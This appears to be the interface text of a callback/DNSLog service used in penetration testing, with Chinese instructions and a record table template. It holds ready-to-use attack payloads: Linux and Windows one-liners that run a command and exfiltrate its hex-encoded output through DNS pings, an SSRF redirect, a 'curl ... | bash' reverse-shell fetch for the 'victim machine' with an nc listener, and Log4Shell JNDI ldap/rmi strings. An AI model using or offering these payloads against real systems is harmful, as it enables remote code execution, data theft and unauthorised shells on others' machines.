# | Type | Record | Ip | req_body | Time |
---|---|---|---|---|---|
{{ index }} | {{ record.type }} | {{ record.subdomain }} | {{ record.ip }} | {{ record.reqbody }} | {{ record.time }} |
CMD="这里填你的命令";RExSP="$(eval "$CMD"|hexdump -v -e '/1 "%02X"')";R=$(tr -dc 'a-z0-9' </dev/urandom | head -c 4 | sed 's/^[\n\r]*//g');i=0;for s in $(echo $RExSP|fold -w 63);do i=$((i+1));ping -c 1 "$s.$i.$R.cmd.{{domain}}">/dev/null;done
这里填你的命令 1> execfile7 && certutil -encodehex -f execfile7 execfile7.txt 4 && (for /f "Delims=: Tokens=1-2" %a in ('findstr /n . execfile7.txt') do (for /f "Tokens=1-16" %c in ('echo %b')do ping -nc 1 %c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r.%a.%RANDOM%.cmd.{{domain}})) && del execfile7 && del execfile7.txt
{{ record.content }}
callback.red/ssrf/10.10.1.1/
=> $ curl callback.red/ssrf/10.10.1.1/ < HTTP/1.1 302 Found < Server: nginx/1.20.1 < Date: Sun, 16 Jan 2022 15:41:36 GMT < Content-Type: text/html;charset=utf-8 < Content-Length: 0 < Connection: keep-alive < Cache-Control: must-revalidate, no-store < Location: http://10.10.1.1/
callback.red/sh4ll/ip:port
受害者机器:
=> $ curl callback.red/sh4ll/1.2.3.4:1234 | bash or $ curl callback.red/sh4ll/1.2.3.4:1234 | sh
你的VPS:
=> $ nc -lvvp 1234 => listening on [any] 1234 ... connect to [1.2.3.4] from fbi.gov [127.0.0.1] 46958
rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/ ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/ 路径后可以添加任何字符或留空 便于识别区分 如: ${jndi:ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/test} ${jndi:rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/hello}